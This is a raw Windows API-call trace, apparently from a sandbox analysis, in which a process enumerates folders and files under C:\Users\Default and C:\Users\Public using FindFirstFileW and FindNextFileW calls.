0x5c8c88 [0068.636] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.636] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.636] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.636] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.636] lstrlenW (lpString="desktop.ini") returned 11 [0068.636] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.636] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.636] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0068.636] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.636] lstrlenW (lpString="PrintHood") returned 9 [0068.637] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x5db068, ftCreationTime.dwLowDateTime=0x5bf070, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0068.637] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.637] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Recent", cAlternateFileName="")) returned 1 [0068.637] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.637] lstrlenW (lpString="Recent") returned 6 [0068.637] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Recent\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x5db068, ftCreationTime.dwLowDateTime=0x5bf070, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0068.637] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.637] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0068.637] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.637] lstrlenW (lpString="Saved Games") returned 11 [0068.637] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.638] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.638] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.638] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.638] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.638] lstrlenW (lpString="desktop.ini") returned 11 [0068.638] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.638] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.638] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Searches", cAlternateFileName="")) returned 1 [0068.638] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.638] lstrlenW (lpString="Searches") returned 8 [0068.638] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.642] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.642] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.642] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.642] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.642] lstrlenW (lpString="desktop.ini") returned 11 [0068.642] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.643] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.643] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="SendTo", cAlternateFileName="")) returned 1 [0068.643] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.643] lstrlenW (lpString="SendTo") returned 6 [0068.643] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x5db068, ftCreationTime.dwLowDateTime=0x5bf070, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0068.644] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.644] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0068.644] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.644] lstrlenW (lpString="Start Menu") returned 10 [0068.644] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Start Menu\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x5db068, ftCreationTime.dwLowDateTime=0x5bf070, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0068.644] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.644] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0068.644] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.644] lstrlenW (lpString="Templates") returned 9 [0068.644] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Templates\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x5db068, ftCreationTime.dwLowDateTime=0x5bf070, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0068.644] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.644] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Videos", cAlternateFileName="")) returned 1 [0068.645] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.645] lstrlenW (lpString="Videos") returned 6 [0068.645] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.645] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.645] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.645] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.645] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.645] lstrlenW (lpString="desktop.ini") returned 11 [0068.645] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.645] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.645] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Videos", cAlternateFileName="")) returned 0 [0068.645] FindClose (in: hFindFile=0x5c8c48 | out: hFindFile=0x5c8c48) returned 1 [0068.646] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0068.646] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xfb5199ba, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0068.646] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.646] lstrlenW (lpString="Default User") returned 12 [0068.646] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default User\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x5b71e8, ftCreationTime.dwLowDateTime=0x5bf070, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Videos", cAlternateFileName="")) returned 0xffffffff [0068.646] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0068.646] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5a5260 | out: lpFindFileData=0x5a5260*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0xfb5199ba, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.646] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.646] lstrlenW (lpString="desktop.ini") returned 11 [0068.646] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5c8c48 [0068.646] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0068.646] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.647] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Desktop", cAlternateFileName="")) returned 1 [0068.647] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.647] lstrlenW (lpString="Desktop") returned 7 [0068.647] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.647] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.647] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.647] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0068.647] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.647] lstrlenW (lpString="Adobe Reader X.lnk") returned 18 [0068.647] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.647] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5baab8 | out: hHeap=0x580000) returned 1 [0068.647] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.647] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.648] lstrlenW (lpString="desktop.ini") returned 11 [0068.648] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\*", lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.648] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.648] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.648] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5baab8 | out: lpFindFileData=0x5baab8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.648] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.648] 